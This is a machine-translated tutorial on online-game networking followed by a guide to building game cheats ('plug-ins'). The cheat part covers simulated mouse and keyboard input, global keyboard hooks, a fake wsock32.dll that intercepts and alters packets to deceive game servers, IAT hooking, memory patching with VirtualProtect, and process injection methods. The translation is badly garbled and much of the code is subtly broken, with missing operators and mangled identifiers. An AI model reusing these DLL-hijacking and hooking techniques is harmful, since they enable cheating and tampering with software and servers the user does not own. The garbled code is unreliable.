After completing the above steps, we need to respond and process on the event, let us see how to get the event message generated by network communication in the network thread: WSAenumNetworkEvents (SSOCKET, HEVENT, & Socketevents); if (socketevents.lnetWorkevents! = 0) {switch (SocketEvents.lNetworkEvents) {case FD_ACCEPT: WSANETWORKEVENTS SocketEvents; break; case FD_CONNECT: {if (SocketEvents.iErrorCode [FD_CONNECT_BIT] == 0) // {// notify successful connection after a successful connection of the main thread (thread game )}}}} Break; case fd_read: // Get network data {IF (RECV (SSocket, PBuffer, LLEngth, 0) == Socket_ERROR) {Failed ("Winsocket Recv Error!";}} Break; Case FD_WRITE: BREAK Case FD_Close: // Notify the main thread (game thread), the network has disconnected BREAK; default: Break;}} This only simulates the network connection (fd_connect) and reading data (fd_read), but actually After the network thread receives the event message, the data will organize the data, then return the data back to our game main thread, the game main thread will send the handled data, such a round-trip constitutes our online game The data communication is the most basic element that makes the online game. Finally, let's talk about the organization of the network packet (data package), the data package of online games is the most basic unit of game data communication, online games Data transmission is not used by the word stream, a data packet can also be seen as a message instruction, in the game, the server and the client will continue to send and receive these message packages, and then analyze the message package Converting the command meaning and execution. Interaction and management interaction, for the player's communication with other players, but for the computer, the implementation of interaction is to implement data messages transfer. As we have learned about the basic concepts of network communication, it constitutes the most basic condition of interaction, and we need to communicate data on this network level. Unfortunately, the computer does not know how to express communication between players, so we need to provide a set of instruction organizations and parsing mechanisms that can make computer understanding, which is the network packet (data package) of us above. Processing mechanism. In order to be more simple to explain the organizational form of network packets, we discuss with a chat processing module to see the following code structure: struct tagmessage {long LTYPE; long lplayerid;}; // message instruction // instruction The related player logo Char Strtalk [256]; // The message content is an extremely simple message package structure, let us talk about the use of its various data fields: First, LTYPE is the type of message instruction, this is The most basic message identifier, this identity is used to tell the server or the specific purpose of this instruction to facilitate the server or client. Lplayerid is identified as a player.
Everyone knows that a player is actually a bunch of data inside the machine, especially in the game server, there may be thousands of players, at this time, we need a tag to distinguish the player, so you can quickly find a specific player. And apply communication data to it. Strtalk is the chat data we have to pass. This part is a real data entity. The front parameters are only limited by the data entity application. After the data is organized, it is followed by transmitting this structural data through the Socket connection. Here we have to understand, the network is in the data transmission process, it does not care about the data structure adopted by the data, which requires us to convert the data structure into a binary data code to send, in the recipient, we will convert these binary data codes The corresponding data structure used in the process. Let's take a look at how to implement: tagmessagemsg; msg.ltypemsg_chat; msg.ltyerid 1000; strcpy (& msg.strtalk, "chat information"); first, we assume that a packet has been organized, here MSG_Chat is the identification of our own definition Val, of course, this identifier is unified in the server and client. The player's ID is set according to the game needs. Here 1000 is used as a hypothesis, now continue: char * p = (char *) & msg; long llength = sizeof (tagMessage); send (ssocket, p, llength); // Get The length of the data structure We convert the structural pointer to a CHAR type data pointer by forced conversion, so that the streaming data processing can be performed by SizeOf (), then use Winsock's send () function. Send the data out. Next, look at how to receive data: long llength = sizeof (tagMessage); char * buffer = new char [llength]; RECV (SSOCKET, BUFFER, LLENGTH); tagMessage * p = (tagMessage *) buffer; // Get data After obtaining network data through the Winsock's RECV () function, we also convert the obtained buffer data into the corresponding structure by forced conversion, which can easily access the data. (Note: Forced conversion only as a means of data conversion, there are more optional methods in practical applications, here only for simple description logic), have to mention how servers / clients can filter each A message and how to manage the communication packet. Whether it is a server or a client, when the network message is received, after the above data is parsed, the message type must be screened and failed. Simply, it is a message loop similar to Windows, and the different messages are different.
This can be understood by a Switch statement (a friend who is familiar with the Windows Message loop), based on the LTYPE information in the message package, the message is drawn, consider the following code segment: Switch (P-> LTYPE) // Here P-> LTYPE logo {CASE MSG_CHAT: / / Chat Msg_Move: // Player Mobile Message Break; Case Msg_Exit: // Player Leave Messages Break; Default: Break;} MSG_MOVE and MSG_EXIT are our virtual message identifiers (the identity in a real game may have hundreds, which requires consideration of optimization and priority message processing issues). In addition, a network gaming server faces hundreds of thousands of connection users, we also need some reasonable data organization management methods to perform relevant processing. Ordinary monomer gaming servers may cause the entire game network to be paralyzed because it is too much, and this is introduced into the packet server mechanism, we separate the server to distributed processing. We extract each module to make a dedicated server system, then build a data center to connect all servers to perform data interaction, where each module creates a connection with the data center, ensuring the correlation of each module, At the same time, the player transforms to connect to the server that is currently providing the service, so that the burden on a single server can be alleviated, disperse the pressure into multiple servers while ensuring the unity of the data, and even if a server is abnormal. And when it does not affect the game players of other modules, thereby increasing overall stability. The grouping server mitigates the server's pressure, but also brings server scheduling issues. The group-based server needs to process server jumps. Take a player's game scene jump as a foundation foundation: Assume some players in the game scene A, He wants to jump from the scene A to the scene b. In the game, we call the scenes to change. At this time, the player will trigger the jump demand, such as the switching point in the scene, so that the server will use the player data from "game scene A Server "delete, and build players in the" Game Scene B Server ". The simple model of scene switching is described here, and there are many steps in the process, but it is believed that you can derive a lot of application skills. However, it should be noted that when the scene switch or inter-module switches, it is necessary to consider the transmission safety of the data and logic rationality, otherwise the switch is likely to be a bridge for future players to replicate items. Summary This article is through some simple processes to communicate online game communication, providing a way of making a production, although there are many need to do, but as long as this idea is expanded, we will be very good. You can write your own network communication module. Due to time rush, this article is omitted in many details, and if there is a mistake in the text, it is also forgiven. GO * ODMORNING collection (Do not delete) Game plug-in design technology discussion 1, preface, so-called game plug-in, it is actually a game auxiliary procedure, which can help players automatically generate game action, modify game network packets, and modify game memory Data, etc., to achieve the least amount of time and money to complete your skill upgrade and pass. Although, now, the "legal" identity of the game plug-in program, here I don't want to post any personal opinions, let the time to explain everything.
Regardless of the "legal" identity, it is a certain technical content, and many high-end technologies are used in these small programs, such as intercepting SOCK technology, intercepting API technology, simulating keyboard and mouse technology, direct Modify program memory technology, etc. This article will conduct a comprehensive analysis of the techniques used in common game plug-in. Second, I know the history of the plug-in game plug-in, the era of stand-alone game, only it used to use another more popular name? "Game modifier. It can track the values of the ability to lock the game protocol in the game. In this way, the player can reach the protagonist without blood, not consuming magic, does not consume money. This reduces the difficulty of the game, making players easier to customize. With the coming of online games, the game has a new development above the original features. It has become more diverse, more powerful, simpler, and more than some games have become a system, such as "Stone Age", plug-in variety reached dozens of kinds, automatic fighting, automatic walking, automatic training, automatic blood, acceleration, do not encounter enemies, in the original enemy, quickly increase experience value, button elves ... almost omnipoes . The game plug-in design is mainly for a game development, and we can roughly mount the plug-in to two major categories according to the type of game it. One type is to use a large number of cumbersome attack motions in the game, using plug-in automatic completion to help players easily get attacks and quickly add players' experience. For example, there is a job in the "Dragon", the higher the player's work, you can control the better equipment. But increasing the work level is not a fun thing, and it is said that it is repeatedly boring mechanical labor. If you want to be a rod used by the Master, you first need to do basic work - cut the tree. The method of chopping trees is very simple, and you can have a mouse before a big tree, and each 10000 experience is promoted. This means that players should click on the mouse before the big tree, this boring thing can be solved by "Button Spirit". The plug-in "button elves" function allows players to get rid of barted clicks on the mouse. Another category produces a spoofing online game package, and sends these packets to the network gaming server, using these false information fraud servers to make a modification of the game value to achieve the purpose of modifying the characteristic value. Such plug-in procedures are very targeted, generally in designing a version of a game, because each network gaming server communicates with the client is different, and the plug-in must be deceived. The data packet of the online game server is analyzed to generate a data packet identified by the server. Such plug-in procedures are also currently the most fluent class of game plug-in. In addition, there are now many plug-in programs, not only automatic action proxy and packet feature, but also provide data for client programs for online games to achieve the purpose of deceiving online game servers. I believe that with the progress of the online game merchant's anti-plug-in technology, the game plug-in will have more and more excellent technology, let us look forward to watching the technology war ... III, plug-in technology overview can be developed The process of the game plug-in program is generally divided into two parts: the previous part of the work is to analyze the main game of the plug-in, and the contents of different types of plug-in analytical body games are different. As the first class in the above-mentioned plug-in type, its analysis process is often analyzed for the position and distribution of the attack object in the game's scene to implement an external automatic attack and location movement. When there are second categories in the plug-in type, its analysis process is often an analysis of the structure, content, and encryption algorithm for communication packet data between the game server and the client. Since the online game company generally does not announce the structure, content and encryption algorithm of the communication package data of its game product, the key to the development of the second type of plug-in success is whether the structure, content, and encryption of the game package data correctly Algorithm, although some tool assistance can be used, this is still a hard and complex work.
The subsequent part of the work is mainly based on the analysis results of the game in the previous period, using a large number of program development technologies to implement the plug-in program to control or modify the game. If the plug-in program is the first type of plug-in, the mouse simulation technology is usually used to implement the automatic position of the game role, using the keyboard simulation technology to implement the automatic attack of the game role. As the plug-in program is a second type of plug-in, it is usually used to block the SOCK and the API function technology to block the network packets sent from the game server and transfer the packet to the game server after the packet is modified. In addition, there are many plug-in use of the game client program memory data modification technology and game acceleration technology. This paper is mainly for program development technologies for the latter use of game plug-in procedures, focusing on program development technologies, which are commonly used in game plug-in: ● Action simulation technology: Mainly including keyboard simulation technology and mouse simulation technology. ● Packet technology: mainly includes blocking SOCK technology and blocking API technology. Fourth, the action simulation technology we introduced before, almost all games have a lot of cumbersome and boring attack actions to increase the player's skills, and those who have not finished the maze, these seem to be synonymous with the role game. Now, plug-in can help players from these cumbersome works, focus on the progress of the game plot. The plug-in program is required to implement functional functions such as automatic role position and automatic attacks, need to use keyboard simulation technology and mouse simulation technology. Below we will focus on these techniques and prepare a simple instance to help readers understand the implementation of action simulation technology. 1. Mouse simulation technology uses a mouse in almost all games to change the position and direction of the role. Players can use only a small mouse to enable the role to swim. So, how do we implement the role without players, can also walk automatically. In fact, this is not difficult, just a few Windows API functions can be customized, let us first understand these API functions. (1) Simulate the mouse action API function mouse_event, which can implement an analog mouse to press and release the action. Void mouse_event (DWORD DWFLAGS, / / mouse action ID. DWORD DX, / / mouse horizontal direction. DWORD DY, / / Mouse vertical position. DWORD DWDATA, // Mouse wheel rotation Number. DWORD DWEXTRAINFO // An associated mouse Action auxiliary information.); Where dwflags represents a wide variety of mouse action and click activities, its common value is as follows: mouseEventf_move represents analog mouse mobile event. MouseEventf_leftdown indicates that the analog presses the left mouse button. MouseEventf_leftUp indicates that the simulation releases the left mouse button. MouseEventf_rightdown indicates that the analog is right-click. MouseEventf_rightUp indicates that the analog releases the right mouse button. MouseEventf_middledown indicates that the analog Press the mouse button. MouseEventf_middleUp indicates that the analog release mouse button. (2) Set and get the API function of the current mouse position. Get the current mouse location Use the getCursorPos () function, set the current mouse location to use the setCursorpos () function. Bool getCursorpos (LPPOINT LPPOINT / / Returns the current location of the mouse.); Bool setCursorpos (horizontal direction of int x, // mouse. The vertical position of the int y // mouse.); Usually the role of the game is through the mouse Move to the destination, then press the button to get the button. Below we use the API function described above to simulate the role walking process.
Cpoint OldPoint, NewPoint; getCursorpos (& OLDPOINT); // Save the current mouse position. NewPoint.x = OldPoint.x 40; newpoint.y = OldPoint.y 10; setCursorpos (NewPoint.x, NewPoint.y); // Set the destination location. Mouse_Event (MouseEventf_RightDown, 0, 0, 0); // The analog is right-click on the mouse button. Mouse_event (MouseEventf_Rightup, 0, 0, 0); // Simulate the right mouse button. 2. Keyboard Simulation Technology In many games, but also provides a mouse operation, but also provides a keyboard operation, and shortcuts can be used when attacking the attack object. In order to make these attacks automatically, the plug-in program needs to use keyboard simulation technology. Like mouse simulation technology, Windows API also provides a series of API functions to complete analog to keyboard actions. Analog Keyboard Action API Function Keydb_Event, which simulates an action on a keyboard on a keyboard to perform or release actions. Void keybd_event (Byte BVK, // Virtual key value. BYTE BSCAN, / / hardware scanning code. DWORD DWFLAGS, // Auxiliary Unit information associated with the keyboard action.); Where BVK represents the virtual key Value, in fact it is a bYTE type value macro, which ranges from 1-254. For the virtual key values, please use the keyword "Virtual-Key Codes" to find relevant information on the MSDN. BSCAN means that when a key is pressed and released on the keyboard, the keyboard system hardware generated scan code, we can convert between the MapVirtualKey () function between the virtual key value and the scan code. DWFlags represents a variety of keyboard actions, which have two values: KeyEventf_extendedKey and KeyEventf_Keyup. Below we use a code to implement the Shift R shortcut to attack the attack object in the game. KeyBD_Event (VK_Control, MapVirtualKey (vk_control, 0), 0, 0); // Press the CTRL button. KeyBD_Event (0x52, MapVirtualKey (0x52, 0), 0, 0); // Under the R key. KeyBD_EVENT (0x52, MapVirtualKey (0x52, 0), KeyEventf_keyup, 0); // release the R key. KeyBD_EVENT (VK_Control, MapVirtualKey (vk_control, 0), keyeventf_keyup, 0); // release the CTRL button. 3. The mouse and keyboard simulation technique described above to activate the simulation of the action part of the game role, but you need to hang the game above the game, you need to connect it to the game's scene window or use a activation key, The activation key like a button crest. We can use the getWindow function to enumerate the window, or you can use the FindWindow function to find a specific window. There is another findwindowex function to find the sub-window of the window. When the game is switched, we can use FindWindowEx to determine some of the characteristics of the current window, thus judge whether it is still in this scene, the method is much more, such as getWindowInfo to determine something For example, when you find a button, you will explain the game scene has been switched.
When using the activation key, you need to develop a full keyboard hook using the Hook technology, which does not specifically introduce the development process of the global hook, in the later examples, we will use the global hook, will learn the global hook Related knowledge. Discussion on Game Plug - in Design Technology. Examples have implemented the above learning, we have basically have the ability to prepare an action game plug-in. Below we will create a brush program plug-in, which implements the location of the automatic mobile phone key and writes a red "R" word. Based on this example, add the corresponding game action rules, you can implement a complete game plug-in. Here, the author doesn't want to use a game as an example to develop plug-in (because no game merchants are authorized!), If readers are interested, find a game, it is best to do test technology. First, we need to write a global hook, use it to activate the plug-in, the activation button is F10. Creating a global hook steps are as follows: (1). Select MFC AppWizard (DLL) to create project ActiveKey and select the MFC Extension DLL type. (2). Insert a new file ActiveKey.h, enter the following code: #ifndef _keydll_h #define _keydll_h class AFX_EXT_CLASS CKEYHOOK: PUBLIC COBJECT {public: ckeyhook (); ~ ckeyhook (); hHOOK START (); // Install hook Bool stop (); // Uninstall hook}; #ENDIF (3). Add the declaration "#include activitykey.h" in the ActiveKey.cpp file. (4). Add a shared data segment in the ActiveKey.cpp file, the code is as follows: // Shared Data Section #pragma data_seg ("Sharedata" hhook glhhook = null; // Hook handle. Hinstance glhinstance = null; // DLL Equity handle . #Pragma data_seg () (5). Set the shared data segment attribute in the ActiveKey.DEF file, the code is as follows: setctions shareddata read write shared (6). Add the CKEYHOOK class to the category of the CKEYHOOK class in the ActiveKey.cpp file. : // Keyboard hook processing function. Extern "C" LResult WinAPI KeyboardProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM) {if (ncode> = 0) {if (wparam == 0x79) // When the F10 button is pressed, Activate plug-in. {// plug-in implementation code .cpoint newpoint, oldpoint; getCursorpos (& OldPoint); newpoint.x = OldPoint.x 40; newpoint.y = OldPoint.y 10; setCursorpos (newpoint.x, newpoint.y) Mouse_Event (MouseEventf_leftdown, 0, 0, 0); // Simulation Press the left mouse button. Mouse_Event (MouseEventf_leftup, 0,0,0, 0); // Simulate the left mouse button.
KeyBD_Event (vk_shift, mappvirtualkey (vk_shift, 0), 0, 0); // Press the Shift key. KeyBD_EVENT (0x52, MapVirtualKey (0x52, 0), 0, 0); // Press the R key. KeyBD_EVENT (0x52, MapVirtualKey (0x52, 0), KeyEventf_keyup, 0); // release the R key. KeyBD_EVENT (VK_SHIFT, MAPVIRTUALKEY (VK_SHIFT, 0), KEYEVENTF_KEYUP, 0); // Release the Shift key. SetCursorpos (Oldpoint.x, OldPoint.y);}} Return Callnexthookex (Glhhook, Ncode, WParam, LParam);} ckeyhook :: ckeyhook ()} ckeyhook :: ~ ckeyhook () {if (glhhhook) stop (); } // Install the global hook. HHOOK CKEYHOOK :: Start () {glhhook = setwindowshookex (wh_keyboard, keyboardproc, glhinstance, 0); // Set keyboard hook. Return GLHHOK;} // Uninstall global hook. Bool ckeyhook :: stop; {bool bresult = true; if (glhhook) BRESULT = UNHOOKWINDOWSHOKEX (GLHHOOK); // Uninstall the keyboard hook. . Return bResult;} (7) modify DllMain function, as follows: extern "C" int APIENTRY DllMain (HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) {// If the parameter lpReserved delete this line UNREFERENCED_PARAMETER (lpReserved); if (dwReason == DLL_PROCESS_ATTACH) {TRACE0 ( "NOtePadHOOK.DLL initializing / n!"; // extension DLL initialization only once if (AfxInitExtensionModule (ActiveKeyDLL, hInstance)) return 0;! new CDynLinkLibrary (ActiveKeyDLL); // Add the DLL dynamic MFC class libraries glhInstance = hInstance; // insert a DLL instance handle} else if (dwReason == DLL_PROCESS_DETACH) {TRACE0 ( "NotePadHOOK.DLL terminating / n!"; // terminate the link library invoked AfxTermExtensionModule (ActiveKeyDLL before } return 1;} (8). Compile project ActiveKey, generate ActiveKey.dll and ActiveKey.Lib. Next, we also need to create a housing to install the global hook in a Windows system, this shell programming steps are as follows: ( 1). Create a dialog mode application, the project is named Simulate. (2). Add a button in the main dialog box, use classwizard to create a Click event. (3). ActiveKey project debug directory ActiveKey .Dll and ActiveKey.lib copied to the Simulate project directory.
(4). From the "Project" menu, select "Settings", pop up the Project Setting dialog, select the Link tab, enter ActiveKey.lib in Object / Library Module. (5). Add the ActiveKey.h header in the ActiveKey project to the Simulate project and add #include activity on stdafx.h. (6). In the button Click the event function to enter the following code: void csimulatedlg :: Onbutton1 () {// Todo: add your control notification handler code hereif (! Bsetup) {m_hook.start (); // Activate the global hook. } else {m_hook.stop (); // Undo the global hook. } bsetup =! bsetup;} (7). Compile the project, and run the program, click the button to activate the plug-in. (8). Start the brush program, select the text tool and set the color of the pen to red, put the mouse in any position, press the F10 key, the brush program automatically move the mouse and write a red uppercase R. Figure 1 shows the status of the brush program before the F10 key, and Figure 2 shows the status of the brush program after pressing the F10 key. Figure 1: Press the F10 State (001.jpg) Figure 2: Press the F10 Status (002.jpg) Five, the package technology passes the introduction of the action simulation technology, we have a certain degree of understanding of the game, and learn The production of action simulation technology is used to achieve simple action simulation game plug-in production. This action analog game has certain limitations, it only can only solve the use of computers that have been subjected to humanity to complete such regular, cumbersome game movements. However, with the increase of online games, many games require the client action information to feed back the server back to the server, after paying these action information, then send the next game action information to the client, so The action simulation technology will lose its original effect. In order to better "plug-in" game, the game plug-in procedure has also been upgraded, and they will advance the simulation of the game user interface layer to the data communication layer, and the game control sent by the package technology in the client-side blocking game server Packets, analyze packets and modify packets; simultaneously create a packet according to the game data packet structure, and then simulate the client to send to the game server, this process is actually a packet process. The technique of packet is the core technique for implementing the second type of game plug-in. The knowledge involved in the package technology is wide, and there are many implementations, such as blocking Winsock, blocking API functions, block messages, VXD drivers, etc. Here we are also not possible in this article, all packet techniques are described in detail, so two methods most commonly used in the game plug-in: block the Winsock and the Block API function. 1. WINSOCK is known that Winsock is a Windows network programming interface, which is working on a Windows application layer that provides a high-level data transfer programming interface that is not related to the underlying transport protocol. In a Windows system, use the Winsock interface to provide a TCP / IP-based network access service, which is done by the WSOCK32.DLL Dynamic Link Library. It is known from the above that any Windows TCP / IP-based applications must access the network through the Winsock interface, and of course the online game program is no exception. From this we can imagine, if we can control the Winsock interface, control the packet between the game client program and the server will also be easy. According to this idea, the following work is how to complete the control Winsock interface. It can be seen from the above introduction that the Winsock interface is actually a series of functions provided by a dynamic link library, and these functions are accessed by these functions.
With this understanding, the problem is better, we can make a similar dynamic link library to replace the original Winsock interface library, implement all functions implemented in Winsock32.dll, and ensure all functions of all functions And the order, the return value type should be the same as the original library. In this self-made dynamic library, we can make a function (such as sending, receiving functions), put the plug-in control code, and finally continues to call the corresponding functional function provided in the original Winsock library, so Sealing functions of blocking, modification, and transmission of network packets can be implemented. The following focuses on the basic steps to create a shutdown Winsock plus program: (1) Create a DLL project, select Win32 Dynamic-Link Library, and select an Empty DLL Project. (2) New files WSOCK32.H, enter the code as follows: 1 Add related variable declaration: hmodule hmodule = null; // module handle Char Buffer [1000]; // Buffer FarProc Proc; // Function Inlet Pointer 2 Definition Pointer to all of the function addresses in the original Winsock library, because the Winsock library provides more than 70 functions, limited to space, where only several common functions are selected, and instructions for these library functions can be referred to MSDN related content. . / / Define the pointer variable to the original Winsock library function address. Socket (__stdcall * socket1) (int, int, int); // Create a SOCK function. INT (__stdcall * wsastartup1) (Word, LPWSADATA); // Initialize the Winsock library function. INT (__stdcall * wsacleanup1) (); // Clear the Winsock library function. INT (__stdcall * rv1) (socket, char far *, int, int); // receives data functions. INT (__stdcall * send1) (socket, const char *, int, int); // Send a data function. INT (_STDCALL * Connect1) (socket, const struct sockaddr *, int); // Create a connection function. INT (_STDCALL * BIND1) (socket, const struct sockaddr *, int); // binding function. ... Other function address pointers are defined. (3) New WSOCK32.CPP file, enter the code as follows: 1 Add related header file declaration: #include
Proc = getProcaddress (HModule, "WSAStartup"; WSAStartup1 = (int (_stdcall *) (word, lpwsadata)) proc; // Gets the address of the original Winsock library and saves to WSacleanup1. Proc = GetProcAddress (HModule i, "Wsacleanup"; wsacleanup1 = (int (_stdcall *)) proc; // Gets the original address of the original SOCK function and saves to Socket1. Proc = getProcadDress (hmodule, "socket"; socket1 = (socket (_stdcall * (int, int, int)) proc; // Get the address of the original connection function and save it to Connect1. Proc = getProcaddress (HModule, "Connect"; connect1 = (int (_stdcall *) (Socket, Const Structure SockAddr *, int)) proc; // Get the address of the original send function and saves to Send1. Proc = getProcaddress (HModule, "Send"; send1 = (int (_stdcall *) (socket, const char *, int, int)) PROC; // Get the address of the original reception function and save it into Recv1. Proc = getProcaddress (HMODULE, "RECV"; RECV1 = (int (_stdcall *) (socket, char far *, int, int, int)) PROC; ... Other acquisition function address code slightly.} else return 0; return 1;} 3 Define the library output function, you can add an external control code in the function we are interested in, in all output functions The last step calls the original Winsock library with the same name function. Partial output function definition code is as follows: // Library output function definition .//winsock initialization function. Int Pascal far wsastartup (Word WVersionRequired, lpwsadat A lpwsadata) {// Call the original Winsock library initialization function Return WSAStartup1 (WVersionRequired, LPWSADATA);} // Winsock End Clear function. INT Pascal Far Wsacleanup (void) {Return WSacleanup1 (); // Call the original Winsock library end cleaning function. } // Create a Socket function. Socket Pascal Far Socket (int Af, int type, int protocol) {// calls the original Winsock library to create a socket function. Return Socket1 (AF, TYPE, Protocol);} // Send Packet Function Int Pascal Far Send (Socket S, Const Char * BUF, INT LEN, INT FLAGS) {// This can be performed on the content of the transmitted buffer BUF Modify to achieve a deception server. Plug-in code ... // call the original Winsock library to send packet functions. Return Send1 (S, BUF, LEN, FLAGS);} // receives the packet function.
INT Pascal Far Recv (Socket S, CHAR FAR * BUF, INT LEN, INT FLAGS) {// This can stop the server side to send to the client, first saved it into the buffer. STRCPY (BUFFER, BUF); // After analyzing the buffer packet data, it is modified according to the player's instruction. Plug-in code ... // finally calls the received packet function in the original Winsock. Return Recv1 (S, Buffer, Len, Flags);} ....... other function definition code slightly. (4), create a new WSOCK32.DEF configuration file, in which all library output functions are added, some declarative code is as follows: library "wsock32" exports WSAStartup @ 1 wsacleanup @ 2 recv @ 3 send @ 4 socket @ 5 bind @ 6 CloseSocket @ 7 Connect @ 8 ... Other output functions declaration code slightly. (5), select "Settings" from the "Project" menu, pop up the Project Setting dialog, select the LINK tab, enter WS2_32.lib in Object / Library Module. (6), compile the project, generate WSOCK32.DLL library files. (7), copy the system directory to the original WSOCK32.DLL library file to the directory of the plug-in, and rename it is wsock.001; copy the WSOCK32.DLL file generated above to the plug-in program. . Restart the game program, at this time, the game program will first load our own WSOCK32.DLL file, and then use the library file to indirectly call the original Winsock interface function to implement access network. Above we only introduce the implementation process of blocking Winsock, as for how to join the plug-in control code, there is also a careful analysis of the plug-in developers to the game data package structure, content, encryption algorithm (this process will be a hard process), Regenerated into an external control code. Regarding packet analysis methods and techniques, it is not the scope of this article. If you are interested, you can check the relevant information. G *Oodmorning Collection (Do not delete) Game plug-in design technology to discuss 32. The API blocking API technology is very similar to the blocking Winsock technology, but the former provides a more powerful function than the latter. Blocking Winsock can only block the WINSOCK interface function, while the Block API can enable the shutdown of all API functions including the Winsock API function. If your plug-in is only intended to stop the Winsock's function, you can only select the shutdown Winsock technology that uses the previous section. With a large number of plug-in programs, they only provide only a shutdown of the packet, but also the shutdown of the Windows API or other DLL library functions used in the game program, so that the functionality of the plug-in is more powerful. For example, you can achieve the Hanhua function of non-Chinese games through the shutdown associated API function. With this tool, you can make your plug-in. The principles of the blocking API technology are also using our own functions to replace the functions provided by Windows or other DLL libraries. It is a bit similar to the principle of blocking Winsock. However, its implementation is more complicated than blocking Winsock, just like implementing a shutdown Winsock process, writing all library files called by the application a simulation library is a bit unlikely, just saying that the Windows API has Thousands, there are many libraries that the function structure provided is not disclosed, so it is not aware of the way a simulation library replaces it, so we must seek a good party.
The ultimate goal of the blocking API is to use the custom function instead of the original function. Then, we should first know when the application, where, and how to call the original function. Next, you need to call the instruction code of the original function in the application to make it point the pointer to the function points to our own defined function address. In this way, the plug-in program fully controls the application-called API function, as for how to join the plug-in code, it should be different. Finally, there is an important issue to be resolved, how to use our customized function code to inject the function code of the original API function in the address space, because the application is only accessible to this process space in the Windows system Code and data in the inside. In summary, to implement a blocking API function, at least the following three issues are required: ● How to locate the game program call API function instruction code? ● How to modify the game program to call the API function instruction code? ● How to put plug-in code (custom replacement function code) into the game program process address space? Below we will introduce these problems to solutions: (1), positioning calling API function instruction code We know, using the CALL instruction in assembly language to call function or processes, it is positioned by function addresses in the command parameters To the corresponding function code. Then, if we can find the CALL instructions of all calls that are being called in the program code, we can modify the function address parameters in the instruction to the address of the alternative function. Although this is a feasible solution, it will be very cumbersome to achieve it. Fortunately, the executable file (PE format) used in the Windows system uses the input address table mechanism, and all the address information of the API function called in the program is stored in the input address table, and use in the program code CALL instruction. The address is not the address of the API function, but the address item of the API function in the address table, if you want to make the API function called in the program code, only use the address item of the API function in the address table. I.e. Specifically understand the operation mechanism of the input address table, you also need to understand the PE format file structure, where Figure 3 lists the general structure of the PE format file. Figure 3: PE format roughly structural map (003.jpg) PE format file One start is a DOS program, when your program is running in a Windows environment, it will show "this Program Cannot Be Run in Dos Mode "Such a warning statement, then the DOS file head, start the real PE file content. The first is a data called "image_nt_header", which is a number of messages about the entire PE file, and the end of this data is a data table known as Data Directory, which can quickly locate some PE files (section) the address of. After this data, it is a list of "image_section_header", each of which describes the relevant information of the later segment. Then it is the most important segment data in the PE file, and information such as executing code, data, and resources, etc. are stored in these segments. In all of these segments, there is a paragraph (input data segment) called ".idata" worth paying attention, this segment contains some data lists called an input address table (IAT, Import Address Table) . Each DLL where the API loaded with an implicit manner has an IAT and the address, and an address of an API is also corresponding to one of IAT.
When an application is loaded into the memory, the corresponding assembly instruction is called for each API function: JMP DWORD PTR [xxxxxxxx] or call dword ptr [xxxxxxxx] where [xxxxxxxx] indicates the input address table. One item, its content is a DWORD, and this DWORD is the true address of the API function in memory. So we want to intercept an API call, as long as it is simple to change the DWORD to our own function. (2), modify the API function code to the analysis of the PE file format from above, the modification call API function code is actually modified to call the API function in the input address table IAT item. Since the Windows system has a strict protection mechanism for the application instruction code address space, the modified program instruction code is very difficult, so that many masters have written VXD to RING0. Here, I will introduce you to a more convenient way to modify the process memory. It only needs to call several Windows core API functions. Here I first learn to learn these API functions: DWord VirtualQuery (lpcvoid lpaddress, // address of Region Pmemory_basic_information lpbuffer, // information buffer DWORD DWLENGTH / / SIZE OF BUFFER; This function is used to query information about the virtual address page within the process. Where lpaddress represents the area address of the query page; lpbuffer represents buffering for saving the query page information; DWLEngth indicates the buffer size. The return value is the actual buffer size. BOOL VirtualProtect (LPVOID lpAddress, // region of committed pages SIZE_T dwSize, // size of the region DWORD flNewProtect, // desired access protection PDWORD lpflOldProtect // old protection); This function is used to change the protection in this process virtual address of the page Attributes. Where lpaddress represents the change protection property page area address; DWSIZE indicates the page area size; flNewProtect represents the new protection attribute, which can be valued for Page_ReadOnly, Page_Execute, etc., LPFLOLDPROTECT indicates that the protection attribute used to save the change. If the function call successfully returns "T", "f" is returned. With these two API functions, we can save the process of modifying the process as you wish. First, call the VirtualQuery () function query page information to be modified, then call the VirtualProtect () function according to this information to change the protection attribute of these pages to Page_Readwrite, with this permission You can modify the process memory data. The following section shows how to clear the byte of the process virtual address to 0x0040106c. BYTE * PDATA = 0x0040106c; memory_basic_information mbi_thunk; // Query page information. VirtualQuery (pData, & mbi_thunk, sizeof); // Change the page protection attribute to read and write. VirtualProtect (Mbi_thunk.Baseaddress, Mbi_thunk.regionSize, Page_Readwrite, & Mbi_thunk.protect); // Clear.
* pdata = 0x00; // Restore the original protection properties of the page. DWORD DWOLDPROTECT; VirtualProtect (Mbi_thunk.Region, Mbi_thunk.region, & dwoldprote; (3) Design a replacement function of a custom API function. Once you have done it, you also need to inject these codes into the pluggable game program process memory space, otherwise the game process will not access the alternative function code at all. There are many injected methods, such as using global hook implants, use the registry to inject the API function in the blocking USER32 library, use the CreateremoteThread injection (only NT / 2000), using BHO injection, etc. Because we have already contacted global hooks in the action simulation technology section, I believe that smart readers have fully mastered the production process of the overall hook, so we will continue to take advantage of this global hook in the following instance. As for several other injection methods, if you are interested, please refer to the MSDN. With the above theoretical basis, let's start making an instance of a blocking Messageboxa and RECV function. When developing a game plug-in program, you can use the instance as a frame, join the corresponding alternative function and processing code. The development process of this instance is as follows: (1) Open the ActiveKey project created in front. (2) Add the HookAPI structure in the ActiveKey.h file, which is used to store the block API function name, original API function address, and alternative function addresses. Typedef struct tag_hookapi {lpcstr szfunc; // is used by HOOK's API function name. Proc pnewproc; // replaces the function address. Proc POLDPROC; // Original API function address. } Hookapi, * lphooki; (3) Open an activeKey.cpp file, first join a function to locate the IAT address in the input database in the input data. The code is as follows: Extern "C" __DECLSPEC (DLLEXPORT) PIMAGE_IMPORT_DESCRIPTOR LOCATIONIAT (HModule HModule, LPCSTR SzimportMod) // where hmodule is the process module handle; SzimportMod is the input library name. {// Check if it is a DOS program, such as returning null, because the DOS program is not IAT. PIMAGE_DOS_HEADER PDOSHEADER = (pimage_dos_header) hmodule; if (pdosheader-> e_magic! = Image_dos_signature) return null; // Check if the NT flag, otherwise returns NULL. PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS) ((DWORD) pDOSHeader (DWORD) (pDOSHeader-> e_lfanew)); if (! PNTHeader-> Signature = IMAGE_NT_SIGNATURE) return NULL; // NULL if no table IAT. IF (pntheader-> optionalheader.dataDirectory [image_directory_entry_import] .virtualaddress == 0) return null; // Positioning the first IAT location.
